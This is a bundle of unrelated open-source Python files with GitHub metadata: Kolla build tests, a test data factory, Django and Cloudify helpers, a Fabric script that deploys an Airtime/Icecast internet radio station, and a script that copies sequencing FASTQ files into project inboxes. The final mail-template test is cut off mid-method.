kolla = build.KollaWorker(self.conf)
self.assertEqual('3.6', kolla.distro_python_version)
def test_build_distro_python_version_rhel8(self):
"""check distro_python_version for RHEL8"""
self.conf.set_override('base', 'rhel')
self.conf.set_override('base_tag', '8')
kolla = build.KollaWorker(self.conf)
self.assertEqual('3.6', kolla.distro_python_version)
def test_build_distro_python_version_ubuntu(self):
"""check distro_python_version for Ubuntu"""
self.conf.set_override('base', 'ubuntu')
kolla = build.KollaWorker(self.conf)
self.assertEqual('3.8', kolla.distro_python_version)
def test_build_distro_python_version_centos(self):
"""check distro_python_version for CentOS 8.0.1905"""
self.conf.set_override('base', 'centos')
self.conf.set_override('base_tag', '8.0.1905')
kolla = build.KollaWorker(self.conf)
self.assertEqual('3.6', kolla.distro_python_version)
def test_build_distro_package_manager(self):
"""check distro_package_manager conf value is taken"""
self.conf.set_override('distro_package_manager', 'foo')
kolla = build.KollaWorker(self.conf)
self.assertEqual('foo', kolla.distro_package_manager)
def test_build_distro_package_manager_rhel8(self):
"""check distro_package_manager dnf for rhel8"""
self.conf.set_override('base', 'rhel')
self.conf.set_override('base_tag', '8')
kolla = build.KollaWorker(self.conf)
self.assertEqual('dnf', kolla.distro_package_manager)
def test_build_distro_package_manager_rhel8_minor(self):
"""check distro_package_manager dnf for rhel8"""
self.conf.set_override('base', 'rhel')
self.conf.set_override('base_tag', '8.1.2')
kolla = build.KollaWorker(self.conf)
self.assertEqual('dnf', kolla.distro_package_manager)
def test_build_distro_package_manager_debian(self):
"""check distro_package_manager apt for debian"""
self.conf.set_override('base', 'debian')
kolla = build.KollaWorker(self.conf)
self.assertEqual('apt', kolla.distro_package_manager)
def test_build_distro_package_manager_ubuntu(self):
"""check distro_package_manager apt for ubuntu"""
self.conf.set_override('base', 'ubuntu')
kolla = build.KollaWorker(self.conf)
self.assertEqual('apt', kolla.distro_package_manager)
def test_base_package_type(self):
"""check base_package_type conf value is taken"""
self.conf.set_override('base_package_type', 'pip')
kolla = build.KollaWorker(self.conf)
self.assertEqual('pip', kolla.base_package_type)
def test_base_package_type_rhel(self):
"""check base_package_type rpm for rhel"""
self.conf.set_override('base', 'rhel')
kolla = build.KollaWorker(self.conf)
self.assertEqual('rpm', kolla.base_package_type)
def test_base_package_type_debian(self):
"""check base_package_type deb for debian"""
self.conf.set_override('base', 'debian')
kolla = build.KollaWorker(self.conf)
self.assertEqual('deb', kolla.base_package_type)
def test_pre_defined_exist_profile(self):
# default profile include the fake image: image-base
self.conf.set_override('profile', ['default'])
kolla = build.KollaWorker(self.conf)
kolla.images = self.images
kolla.filter_images()
self.assertEqual(1, len(self._get_matched_images(kolla.images)))
def test_pre_defined_exist_profile_not_include(self):
# infra profile do not include the fake image: image-base
self.conf.set_override('profile', ['infra'])
kolla = build.KollaWorker(self.conf)
kolla.images = self.images
kolla.filter_images()
self.assertEqual(0, len(self._get_matched_images(kolla.images)))
def test_pre_defined_not_exist_profile(self):
# NOTE(jeffrey4l): not exist profile will raise ValueError
self.conf.set_override('profile', ['not_exist'])
kolla = build.KollaWorker(self.conf)
kolla.images = self.images
self.assertRaises(ValueError,
kolla.filter_images)
@mock.patch('json.dump')
def test_list_dependencies(self, dump_mock):
self.conf.set_override('profile', ['all'])
kolla = build.KollaWorker(self.conf)
kolla.images = self.images
kolla.filter_images()
kolla.list_dependencies()
dump_mock.assert_called_once_with(mock.ANY, sys.stdout, indent=2)
def test_summary(self):
kolla = build.KollaWorker(self.conf)
kolla.images = self.images
kolla.image_statuses_good['good'] = build.Status.BUILT
kolla.image_statuses_bad['bad'] = build.Status.ERROR
kolla.image_statuses_allowed_to_fail['bad2'] = build.Status.ERROR
kolla.image_statuses_unmatched['unmatched'] = build.Status.UNMATCHED
results = kolla.summary()
self.assertEqual('error', results['failed'][0]['status']) # bad
self.assertEqual('error', results['failed'][1]['status']) # bad2
@mock.patch('shutil.copytree')
def test_work_dir(self, copytree_mock):
self.conf.set_override('work_dir', 'tmp/foo')
kolla = build.KollaWorker(self.conf)
kolla.setup_working_dir()
self.assertEqual('tmp/foo/docker', kolla.working_dir)
class MainTest(base.TestCase):
@mock.patch.object(build, 'run_build')
def test_images_built(self, mock_run_build):
image_statuses = ({}, {'img': 'built'}, {}, {}, {}, {})
mock_run_build.return_value = image_statuses
result = build_cmd.main()
self.assertEqual(0, result)
@mock.patch.object(build, 'run_build')
def test_images_unmatched(self, mock_run_build):
image_statuses = ({}, {}, {'img': 'unmatched'}, {}, {}, {})
mock_run_build.return_value = image_statuses
result = build_cmd.main()
self.assertEqual(0, result)
@mock.patch.object(build, 'run_build')
def test_no_images_built(self, mock_run_build):
mock_run_build.return_value = None
result = build_cmd.main()
self.assertEqual(0, result)
@mock.patch.object(build, 'run_build')
def test_bad_images(self, mock_run_build):
image_statuses = ({'img': 'error'}, {}, {}, {}, {}, {})
mock_run_build.return_value = image_statuses
result = build_cmd.main()
self.assertEqual(1, result)
@mock.patch('sys.argv')
@mock.patch('docker.APIClient')
def test_run_build(self, mock_client, mock_sys):
result = build.run_build()
self.assertTrue(result)
@mock.patch.object(build, 'run_build')
def test_skipped_images(self, mock_run_build):
image_statuses = ({}, {}, {}, {'img': 'skipped'}, {}, {})
mock_run_build.return_value = image_statuses
result = build_cmd.main()
self.assertEqual(0, result)
@mock.patch.object(build, 'run_build')
def test_unbuildable_images(self, mock_run_build):
image_statuses = ({}, {}, {}, {}, {'img': 'unbuildable'}, {})
mock_run_build.return_value = image_statuses
result = build_cmd.main()
self.assertEqual(0, result)
| {
"content_hash": "cf2b15bdacb67a104c77e3d51778d887",
"timestamp": "",
"source": "github",
"line_count": 700,
"max_line_length": 79,
"avg_line_length": 40.925714285714285,
"alnum_prop": 0.6146676905892209,
"repo_name": "stackforge/kolla",
"id": "10d70ce5a84916a040a1f3c6a4dd7d5bea08dbca",
"size": "29193",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kolla/tests/test_build.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Lua",
"bytes": "23313"
},
{
"name": "Python",
"bytes": "135311"
},
{
"name": "Ruby",
"bytes": "8751"
},
{
"name": "Shell",
"bytes": "34652"
}
],
"symlink_target": ""
} |
from intranet3 import models
class FactoryMixin(object):
# Current state of counter
cid = 1 # Client
uid = 1 # User
pid = 1 # Project
tid = 1 # Tracker
def create_user(
self,
name="",
domain="stxnext.pl",
groups=[],
**kwargs
):
username = name or "user_%s" % self.uid
user = models.User(
email="%s@%s" % (username, domain),
name=username,
location="wroclaw",
refresh_token='test_token',
**kwargs
)
user.groups = groups
models.DBSession.add(user)
models.DBSession.flush()
if name == "":
self.uid += 1
return user
def create_users(
self,
amount=1,
domain="stxnext.pl",
groups=[],
**kwargs
):
return [
self.create_user(
domain=domain,
groups=groups,
**kwargs
)
for i in xrange(0, amount)
]
def create_client(self, name="", user=None, **kwargs):
if user is None:
user = self.create_user(groups=['user'])
client = models.Client(
coordinator_id=user.id,
name="client_%s" % self.cid,
color="red?",
emails="blabla@gmail.com",
**kwargs
)
models.DBSession.add(client)
models.DBSession.flush()
self.cid += 1
return client
def create_tracker(self, name="", **kwargs):
name = name or "tracker_%s" % self.tid
tracker = models.Tracker(
type="bugzilla",
name=name,
url="http://%s.name" % name,
mailer='tracker_mailer@example.com',
**kwargs
)
models.DBSession.add(tracker)
models.DBSession.flush()
self.tid += 1
return tracker
def add_creds(self, user, tracker, login, password='passwordx'):
creds = models.TrackerCredentials(
tracker_id=tracker.id,
user_id=user.id,
login=login,
password=password,
)
models.DBSession.add(creds)
models.DBSession.flush()
return creds
def create_project(
self,
name='test project',
user=None,
client=None,
tracker=None,
**kwargs
):
if user is None:
user = self.create_user()
if client is None:
client = self.create_client()
if tracker is None:
tracker = self.create_tracker()
name = name or "project_%s" % self.pid
project = models.Project(
name=name,
coordinator_id=user.id,
client_id=client.id,
tracker_id=tracker.id,
active=True,
**kwargs
)
models.DBSession.add(project)
models.DBSession.flush()
self.pid += 1
return project
| {
"content_hash": "21976867e5a5f670b8c1c70a28471e71",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 68,
"avg_line_length": 26.043478260869566,
"alnum_prop": 0.48981636060100164,
"repo_name": "stxnext/intranet-open",
"id": "f758077e4bdd541042768d7c9e0dc04a34aeeac5",
"size": "2995",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/intranet3/intranet3/testing/factory.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "209248"
},
{
"name": "JavaScript",
"bytes": "67808"
},
{
"name": "Python",
"bytes": "535298"
},
{
"name": "SQL",
"bytes": "5168"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, print_function, unicode_literals
from aldryn_apphooks_config.models import AppHookConfig
from aldryn_apphooks_config.utils import setup_config
from app_data import AppDataForm
from django import forms
from django.db import models
from django.utils.translation import ugettext_lazy as _
class ExampleConfig(AppHookConfig):
"""Adds some translatable, per-app-instance fields."""
app_title = models.CharField(_('application title'), max_length=234)
class AnotherExampleConfig(AppHookConfig):
max_entries = models.SmallIntegerField(default=5)
class ExampleConfigForm(AppDataForm):
property = forms.CharField()
published_default = forms.BooleanField(initial=True, required=False)
setup_config(ExampleConfigForm, ExampleConfig)
class AnotherExampleConfigForm(AppDataForm):
property = forms.CharField()
setup_config(AnotherExampleConfigForm, AnotherExampleConfig)
| {
"content_hash": "7a2e291aa7102e09ac21e2c1cadc4e76",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 72,
"avg_line_length": 33.214285714285715,
"alnum_prop": 0.7989247311827957,
"repo_name": "Venturi/oldcms",
"id": "b11eb075c2b16edd7e9c690a52e130b9f8f53836",
"size": "954",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "env/lib/python2.7/site-packages/aldryn_apphooks_config/tests/utils/example/cms_appconfig.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "40171"
},
{
"name": "CSS",
"bytes": "418090"
},
{
"name": "HTML",
"bytes": "467117"
},
{
"name": "JavaScript",
"bytes": "916100"
},
{
"name": "PHP",
"bytes": "2231"
},
{
"name": "Python",
"bytes": "15786894"
},
{
"name": "Ruby",
"bytes": "990"
},
{
"name": "Shell",
"bytes": "3743"
},
{
"name": "XSLT",
"bytes": "157892"
}
],
"symlink_target": ""
} |
"""
RadioX
Copyright 2012 - Rob Cakebread <cakebread@gmail.com>
License: BSD
git://github.com/cakebread/radiox.git
RadioX is an internet radio station broadcasting Icecast2 or Shoutcast.
The goal of the RadioX project is to make an easily deployable, fully
featured internet radio station with live on-air conferencing requiring
no special hardware - callers dial in with regular phones.
The public facing website for displaying show schedules and what
is currently being played is powered by Django, Mezzanine and
Bootstrap for a modern look and feel in browsers and on phones.
Airtime can be used for the web interface to schedule shows by DJs and
station managers. If you don't need scheduling, RadioX can be controlled by
any mpd client. This allows DJing from phones without needing to worry
about dropped connections. The media is stored on the RadioX server.
heduling of shows. Liquidsoap is an audio programming language developed
to mix audio sources and stream to an Icecast or Shoutcast server.
RadioX can be put into request mode where listeners cand send SMS
text messages or Jabber IMs to search for and request songs.
RadioX will act as a SIP endpoint or Google Voice endpoint and uses Twilio
for conference calls and purchasing phone numbers.
This is a Cuisine Fabric file. It will take a freshly installed
Ubuntu 12.04 LTS box and turn it into an Icecast radio station.
The scheduling is controlled by the powerful Airtime software.
The backend and most of the scripting is in Python. For the public facing
website, Django is git://github.com/cakebread/radiox.gitused to show schedules.
To get a fully functioning radio station streaming on port 9999 on
your local Linux box using Vagrant:
Put this fab file inside a Python virtualenv, then:
$ vagrant up
$ fab vagrant setup
A few sample songs are in the library and your radio station is now
streaming music!
Accessing the Radio Staion running in the Vagrant VirtualBox:
Stream:
http://localhost:9999/airtime_128
(Icecast2 URL for phones, media players etc.)
Airtime Admin Web Interface for Djs :
http://localhost:9080 (Airtime admin interface)
"""
from cuisine import *
from fabric.api import *
#############################################################################
# Define your deployment hosts here
#############################################################################
def vagrant():
"""Use Vagrant VirtualBox as host"""
env.user = 'vagrant'
env.hosts = ['127.0.0.1:2222']
result = local('vagrant ssh-config | grep IdentityFile', capture=True)
env.key_filename = result.lstrip('IdentityFile').strip()
def production():
"""Define your production host(s) you want to deploy to"""
#WARNING:
#
# ** This has only been tested with Vagrant / VirtualBox **
#
# ** Don't use on existing production sites unless you're familiar **
# ** with what the Airtime .deb does to your Apache config! **
# ** TODO: Don't use Airtime .deb, use nginx, no apache2 **
#
# Use on a fresh installation of Ubuntu 12.04 LTS
# (Airtime's .deb will clobber your existing Apache config)
env.user = 'pollard'
env.hosts = ['gbvdb.com', 'i-am-a-scientist.com']
#############################################################################
# Deployment functions
#############################################################################
def install_airtime():
'''Install Airtime .deb'''
run('wget http://apt.sourcefabric.org/misc/airtime-easy-setup.deb')
sudo('dpkg -i ./airtime-easy-setup.deb')
sudo('apt-get update')
sudo('apt-get --yes install airtime')
def install_pg_utf8():
with prefix('export LC_ALL=en_US.UTF-8'):
sudo('apt-get --yes install libossp-uuid16')
sudo('apt-get --yes install postgresql')
sudo('apt-get --yes install postgresql-client-9.1')
sudo('apt-get --yes install postgresql-9.1')
sudo('apt-get --yes install postgresql-contrib-9.1')
def setup_locale():
'''Set UTF-8 locale'''
sudo('echo "en_US.UTF-8 UTF-8" > /var/lib/locales/supported.d/local')
sudo('echo "############################" >> /etc/bash.bashrc')
sudo('echo "#Added by RadioX for sanity:\n" >> /etc/bash.bashrc')
sudo('echo "LANGUAGE=en_US.UTF-8" >> /etc/bash.bashrc')
sudo('echo "LANG=en_US.UTF-8" >> /etc/bash.bashrc')
sudo('echo "LC_ALL=en_US.UTF-8" >> /etc/bash.bashrc')
sudo('echo "LC_ALL=en_US.UTF-8" > /etc/default/locale')
sudo('echo "LANG=en_US.UTF-8" >> /etc/default/locale')
sudo('locale-gen en_US.UTF-8')
sudo('dpkg-reconfigure locales')
def upgrade():
sudo('apt-get update')
sudo('apt-get --yes upgrade')
def setup():
'''Deploy basic packages'''
# Ensure postgresql database encoding is UTF-8
setup_locale()
upgrade()
install_pg_utf8()
server = ['pgbouncer', 'supervisor']
dev = ['tmux', 'vim', 'git-core', 'build-essential', 'gettext',
'apache2-utils', 'phppgadmin']
py = ['python2.7', 'python2.7-dev', 'python-setuptools', 'python-pip',
'python-dev', 'python-virtualenv']
airtime = ['apache2', 'apache2-mpm-prefork',
'apache2.2-bin', 'apache2.2-common', 'autoconf',
'automake', 'autotools-dev', 'binutils', 'cpp', 'cpp-4.6', 'curl',
'debconf-utils', 'ecasound', 'erlang-asn1', 'erlang-base',
'erlang-corba', 'erlang-crypto', 'erlang-dev', 'erlang-diameter',
'erlang-docbuilder', 'erlang-edoc', 'erlang-erl-docgen',
'erlang-eunit', 'erlang-ic', 'erlang-inets', 'erlang-inviso',
'erlang-mnesia', 'erlang-nox', 'erlang-odbc', 'erlang-os-mon',
'erlang-parsetools', 'erlang-percept', 'erlang-public-key',
'erlang-runtime-tools', 'erlang-snmp', 'erlang-ssh', 'erlang-ssl',
'erlang-syntax-tools', 'erlang-tools', 'erlang-webtool',
'erlang-xmerl', 'esound-common', 'faad', 'fontconfig-config',
'freepats', 'gcc', 'gcc-4.6', 'icecast2', 'lame', 'libao-common',
'libao-ocaml', 'libao4', 'libapache2-mod-php5', 'libapr1',
'libaprutil1', 'libaprutil1-dbd-sqlite3', 'libaprutil1-ldap',
'libasound2', 'libasyncns0', 'libaudio2', 'libaudiofile1',
'libc-dev-bin', 'libc6-dev', 'libcamomile-ocaml-data', 'libesd0',
'libfaad2', 'libflac8', 'libfontconfig1', 'libgd2-xpm', 'libgomp1',
'libice6', 'libjack-jackd2-0', 'libjpeg-turbo8', 'libjpeg8',
'libjson0', 'libkvutils4', 'liblo7', 'libltdl-dev', 'libltdl7',
'libmad-ocaml', 'libmad0', 'libmikmod2', 'libmp3lame0', 'libmpc2',
'libmpfr4', 'libmpg123-0', 'libodbc1', 'libogg0', 'liboil0.3',
'libportaudio2', 'libpq5', 'libpulse0', 'libquadmath0',
'libsamplerate0', 'libsctp1', 'libsm6', 'libsndfile1',
'libsoundtouch-ocaml', 'libsoundtouch0', 'libspeex1', 'libssl-dev',
'libssl-doc', 'libt1-5', 'libtag1-vanilla', 'libtag1c2a',
'libtaglib-ocaml', 'libtheora0', 'libtool', 'libvorbis0a',
'libvorbisenc2', 'libvorbisfile3', 'libx11-6', 'libx11-data',
'libxaw7', 'libxext6', 'libxmu6', 'libxpm4', 'libxslt1.1', 'libxt6',
'linux-libc-dev', 'lksctp-tools', 'm4', 'manpages-dev', 'mikmod',
'monit', 'mpg123', 'multitail', 'ocaml-base-nox', 'odbc-postgresql',
'odbcinst', 'odbcinst1debian2', 'oss-compat', 'php-pear', 'php5-cli',
'php5-common', 'php5-curl', 'php5-dev', 'php5-gd', 'php5-pgsql',
'rabbitmq-server', 'shtool', 'ssl-cert', 'timidity', 'unzip',
'timidity-daemon', 'ttf-dejavu-core', 'vorbis-tools',
'x11-common', 'zlib1g-dev']
for pkg in server + dev + py + airtime:
package_ensure(pkg)
sudo('pip install virtualenvwrapper')
install_airtime()
add_songs()
update_liquidsoap_script()
print("You can listen to the stream with: mplayer http://localhost:9999/airtime_128")
print("The Airtime web interface: at: http://localhost:9080")
print("Public facing web interface coming soon in Django.")
def update_liquidsoap_script():
"""Replace default Airtime liquidsoap script with RadioX"""
radiox = 'liquidsoap/ls_script.liq'
file_upload(
'/usr/lib/airtime/pypo/bin/liquidsoap_scripts/ls_script.liq',
radiox,
sudo='pypo')
sudo('service airtime-liquidsoap restart')
def add_songs():
sudo('mkdir tmp')
with cd('tmp'):
sudo('wget -q http://www.robertpollard.net/sounds/tabbyandlucy.mp3')
sudo('wget -q http://www.robertpollard.net/sounds/Come%20On%20Baby%20Grace.mp3')
sudo('wget -q http://www.robertpollard.net/sounds/questiongirlallright.mp3')
sudo('wget -q http://www.robertpollard.net/sounds/jimmy.mp3')
sudo('wget -q http://www.robertpollard.net/sounds/imaginaryqueenanne.mp3')
sudo('wget -q http://www.robertpollard.net/sounds/loveyourspaceman.mp3')
sudo('airtime-import -m ./*mp3')
def install_mezzanine_dev():
"""Install local copy of Mezzanine for developer
Mezzanine isn't deployed on the vagrant box when Airtime is deployed.
The developer will want to modify the Django site locally then deploy.
The Django front-end is not required to stream music,
it's purely informational, public-facing. You can reach
it at http://localhost:8000/
"""
local('pip install -r requires.txt')
local('mezzanine-project radiox')
with lcd('radiox'):
local('python manage.py createdb')
local('python manage.py runserver')
#############################################################################
#Use these functions to diagnose problems. They are non-destructive.
#############################################################################
def show_sudo_locale():
sudo('locale')
def show_pg_locale():
sudo('sudo -u postgres locale')
def show_pg_encoding():
sudo('sudo -u postgres psql -c "SHOW SERVER_ENCODING"')
def show_airtime_status():
sudo('service airtime-media-monitor status')
print('After port forwarding:')
print('AIRTIME_STATUS_URL = http://localhost:9080/api/status/format/json/api_key/%%api_key%%')
| {
"content_hash": "ad978907622f236c14de122665be1825",
"timestamp": "",
"source": "github",
"line_count": 264,
"max_line_length": 98,
"avg_line_length": 39.59848484848485,
"alnum_prop": 0.6176583126076143,
"repo_name": "cakebread/radiox",
"id": "c12cf3871ff74505d28267d398e0600f040a581c",
"size": "10454",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "fabfile.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Ruby",
"bytes": "704"
}
],
"symlink_target": ""
} |
import sys, os, yaml, glob, shutil
from datetime import datetime
def fixProjName(pname):
newname = pname[0].upper()
postperiod = False
for i in range(1, len(pname)):
if pname[i] == ".":
newname += pname[i]
postperiod = True
elif postperiod:
newname += pname[i].upper()
postperiod = False
else:
newname += pname[i]
postperiod = False
return newname
if len(sys.argv) < 5:
print "USAGE: python " + sys.argv[0] + " <project ID> <run name> <UPPMAX project> <Dry run, y/n>"
sys.exit(0)
base_path = '/proj/a2010002/nobackup/illumina/'
base_yaml_path = '/proj/a2010002/archive/'
# base_yaml_path = '/bubo/home/h9/mikaelh/'
dry = True
projid = sys.argv[1].lower()
runname = sys.argv[2].strip("/")
abbr_runname = runname.split("_")[0] + "_" + runname.split("_")[3]
yamlfile = base_yaml_path + runname + "/run_info.yaml"
uppmaxproj = sys.argv[3]
# print "Project name: ", fixProjName(projid)
if sys.argv[4].lower() == "n": dry = False
projdata = yaml.load(open(yamlfile))
dt = datetime.now()
time_str = str(dt.year) + "_" + str(dt.month) + "_" + str(dt.day) + "_" + str(dt.hour) + "_" + str(dt.minute) + "_" + str(dt.second)
if not dry:
logfilename = "/bubo/home/h9/mikaelh/delivery_logs/" + time_str + ".log"
logfile = open(logfilename, "w")
print "Project to move files for:", projid
if not dry: logfile.write("Project to move files for:" + "\n" + fixProjName(projid) + "\n")
matching = set()
available = set()
for entry in projdata:
available.add(entry['description'].split(',')[-1].strip())
if entry['description'].split(',')[-1].strip().lower()==projid:
matching.add(entry['lane'])
elif entry.has_key('multiplex'):
for sample in entry['multiplex']:
if sample.has_key('sample_prj'):
available.add(sample['sample_prj'])
if sample['sample_prj'].split(',')[-1].strip().lower()==projid:
matching.add(entry['lane'])
if len(matching)==0:
print "No matching project found. Possibilities:"
for prid in sorted(available):
print prid
sys.exit(0)
elif dry:
print "I will move files from lanes " + ",".join(matching)
if not dry: logfile.flush()
# Create directory in user's INBOX
temp = runname.split('_')
start_date = temp[0]
flow_cell = temp[3][0] # A or B
created_proj_dir_name = fixProjName(projid)
created_run_dir_name = "20" + start_date + flow_cell + "_hiseq2000"
# "Old school" style
#del_path = '/proj/' + uppmaxproj + "/INBOX/" + created_proj_dir_name + "/" + created_run_dir_name
# New
del_path_top = '/proj/' + uppmaxproj + "/INBOX/" + created_proj_dir_name
print "Will create a top-level project directory", del_path_top
if not dry:
logfile.write("Creating top-level delivery directory:" + del_path_top + " (or leaving it in place if already present)\n")
if os.path.exists(del_path_top):
print "Directory", del_path_top, " already exists!"
else:
try:
os.mkdir(del_path_top)
except:
print "Could not create delivery directory!"
sys.exit(0)
del_path = del_path_top + "/" + abbr_runname
print "Will create a run directory", del_path
if not dry:
logfile.write("Creating run-level delivery directory:" + del_path + " (or leaving it in place if already present)\n")
if os.path.exists(del_path):
print "Directory", del_path, " already exists!"
else:
try:
os.mkdir(del_path)
except:
print "Could not create delivery directory!"
sys.exit(0)
# Start looking for the files to transfer
temp = runname.split('_')
dirs_to_process = []
for m in sorted(matching):
d = m + "_" + temp[0] + "_" + temp[3] + "_nophix"
dirs_to_process.append(d)
os.chdir(base_path + runname )
for d in dirs_to_process:
#dirpath = d + "_barcode/2_mismatch"
dirpath = d + "_barcode"
if not os.path.exists(dirpath):
print "Could not find directory", dirpath
print "Standing in ", os.getcwd()
sys.exit(0)
os.chdir(dirpath)
bcname = d + "_bc.metrics"
if not os.path.exists(bcname):
bcname = d + ".bc_metrics"
lane = dirpath[0]
print "LANE ", lane
if not dry: logfile.write("LANE " + lane + "\n")
# Print table of Illumina vs. bcbb barcodes
sample_id_and_idx = {}
lane_info = "none"
# The 'main_proj_for_lane' stuff is outdated since March 2012
# main_proj_for_lane = ''
for entry in projdata:
if entry['lane'] == lane:
lane_info = entry
# is_main_proj = True
# main_proj_for_lane = entry['description'].split(',')[-1].strip().lower()
# if main_proj_for_lane == projid:
# print projid, "is the main project for lane", lane
# else:
# print "This project is not the main project for lane ", lane, ". The main project is ", main_proj_for_lane
# is_main_proj = False
lane_sample = ''
if lane_info.has_key('multiplex'):
for bc in lane_info['multiplex']:
if bc.has_key('sample_prj'):
if bc['sample_prj'].split(',')[-1].strip().lower() == projid:
sample_id_and_idx[bc['barcode_id']] = bc['name']
# elif is_main_proj:
# sample_id_and_idx[bc['barcode_id']] = bc['name']
print "Pipeline index\tSampleName\t# matching sequences"
if not dry: logfile.write("Pipeline index\tIllumina index/sample ID\tMatches\n")
if os.path.exists(bcname):
for line in open(bcname):
[bcbb_bc, hits] = line.strip().split()
try:
if sample_id_and_idx.has_key(int(bcbb_bc)):
print bcbb_bc + "\t" + sample_id_and_idx[int(bcbb_bc)] + "\t" + hits
if not dry: logfile.write(bcbb_bc + "\t" + sample_id_and_idx[int(bcbb_bc)] + "\t" + hits + "\n")
except:
if bcbb_bc == "unmatched":
print bcbb_bc + "\t" + "N.A." + "\t" + hits
if not dry: logfile.write(bcbb_bc + "\t" + "N.A." + "\t" + hits + "\n")
else:
print "Encountered parsing error in barcode conversion: " + bcbb_bc
print sample_id_and_idx
sys.exit(0)
else:
print "BC metrics file", bcname, " not found"
sys.exit(0)
else:
print "Non-multiplexed lane"
print "Please type a sample name for this lane"
lane_sample = raw_input()
if not dry: logfile.write("Non-multiplexed lane\n")
# print os.listdir(".")
files_to_copy = []
for fastq_file in (glob.glob("*fastq.txt") + glob.glob("*fastq.txt.gz")):
# Skip if this is a non-compressed file and there exists a compressed version
if os.path.exists(fastq_file + ".gz"):
continue
ext = ""
if os.path.splitext(fastq_file)[1] == ".gz":
ext = os.path.splitext(fastq_file)[1]
if lane_info.has_key('multiplex'):
new_file_name = ''
if 'unmatched' in fastq_file: continue
# Extract barcode
[lane, date, run_id, nophix, bcbb_bc, pe_read, dummy] = fastq_file.split("_")
#[lane, date, run_id, bcbb_bc, pe_read, dummy] = fastq_file.split("_")
if sample_id_and_idx.has_key(int(bcbb_bc)):
customer_sample_id = sample_id_and_idx[int(bcbb_bc)]
new_file_name = lane + "_" + date + "_" + run_id + "_" + customer_sample_id.replace("/", "_") + "_" + pe_read + ".fastq" + ext
else:
[lane, date, run_id, nophix, name, pe_read,dummy] = fastq_file.split("_")
#[lane, date, run_id, name, pe_read,dummy] = fastq_file.split("_")
new_file_name = lane + "_" + date + "_" + run_id + "_" + lane_sample + "_" + pe_read + ".fastq" + ext
# print "Preparing to copy file", fastq_file, "as ", new_file_name
if new_file_name != '': files_to_copy.append([fastq_file, new_file_name])
for pair in files_to_copy:
source = os.getcwd() + "/" + pair[0]
dest = del_path + "/" + pair[1]
print "Will copy (rsync) ", source, "to ", dest
if not dry:
command_to_execute = 'rsync -ac ' + source + ' ' + dest
logfile.write("Executing command: " + command_to_execute + "\n")
logfile.flush()
os.system(command_to_execute)
os.chdir('..')
#os.chdir('../..')
if not dry:
os.chdir(del_path)
logfile.close()
os.system("chmod -R g+rw " + del_path)
| {
"content_hash": "4fcf2350c1e90a18b7990cee0ea823e7",
"timestamp": "",
"source": "github",
"line_count": 237,
"max_line_length": 144,
"avg_line_length": 37.371308016877634,
"alnum_prop": 0.5502991983741673,
"repo_name": "kate-v-stepanova/scilifelab",
"id": "ed33692156b57f4b61d73316c28ff121294125ac",
"size": "8979",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "scripts/assisted_delivery.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "3192"
},
{
"name": "Mako",
"bytes": "13990"
},
{
"name": "Python",
"bytes": "1317628"
},
{
"name": "R",
"bytes": "4089"
},
{
"name": "Shell",
"bytes": "38653"
}
],
"symlink_target": ""
} |
import json
import os
from cloudify.context import BootstrapContext
from cloudify.mocks import MockCloudifyContext
RETRY_AFTER = 1
# Time during which no retry could possibly happen.
NO_POSSIBLE_RETRY_TIME = RETRY_AFTER / 2.0
BOOTSTRAP_CONTEXTS_WITHOUT_PREFIX = (
{
},
{
'resources_prefix': ''
},
{
'resources_prefix': None
},
)
def set_mock_provider_context(ctx, provider_context):
def mock_provider_context(provider_name_unused):
return provider_context
ctx.get_provider_context = mock_provider_context
def create_mock_ctx_with_provider_info(*args, **kw):
cur_dir = os.path.dirname(os.path.realpath(__file__))
full_file_name = os.path.join(cur_dir, 'provider-context.json')
with open(full_file_name) as f:
provider_context = json.loads(f.read())['context']
kw['provider_context'] = provider_context
kw['bootstrap_context'] = BootstrapContext(provider_context['cloudify'])
return MockCloudifyContext(*args, **kw)
| {
"content_hash": "0487a192f3eb0e80b3a0815b168c270d",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 76,
"avg_line_length": 25.325,
"alnum_prop": 0.684106614017769,
"repo_name": "GigaSpaces-ProfessionalServices/cloudify-openstack-plugin",
"id": "13099292cac9bd119db4c4d68d73c64f1b1b1878",
"size": "1013",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "openstack_plugin_common/tests/test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "1033"
},
{
"name": "Python",
"bytes": "229465"
}
],
"symlink_target": ""
} |
from django.core.exceptions import ImproperlyConfigured
from django.core.mail import EmailMessage
from django.template import TemplateDoesNotExist
from django.test import TestCase
from mail_utils import TemplateMixin
class TemplatelessMessage(TemplateMixin, EmailMessage):
template_name = None
class Message(TemplateMixin, EmailMessage):
template_context = {'reason': 'Test', 'sender': 'Dima Kurguzov'}
template_name = 'email.html'
class TemplateMixinTestCase(TestCase):
def test_exception_when_template_name_is_not_set(self):
with self.assertRaises(ImproperlyConfigured):
TemplatelessMessage()
def test_exception_when_template_does_not_exist(self):
with self.assertRaises(TemplateDoesNotExist):
Message(template_name='does_not_exist')
def test_content_subtype_is_plain_by_default(self):
msg = Message(template_name='email.txt')
self.assertEqual('plain', msg.content_subtype)
def text_content_subtype_is_html_when_template_name_ends_with_html(self):
msg = Message(template_name='email.html')
self.assertEqual('html', msg.content_subtype)
def test_use_passed_template_name_parameter(self):
msg = Message(template_name='email.txt')
self.assertEqual('email.txt', msg.template_name)
def test_use_passed_body_parameter_instead_of_template(self):
self.assertEqual('New message', Message(body='New message').body)
def test_use_template_when_body_parameter_is_not_passed(self):
self.assertIn('We are glad', Message(template_name='email.html').body)
def test_update_template_context_with_passed_parameter(self):
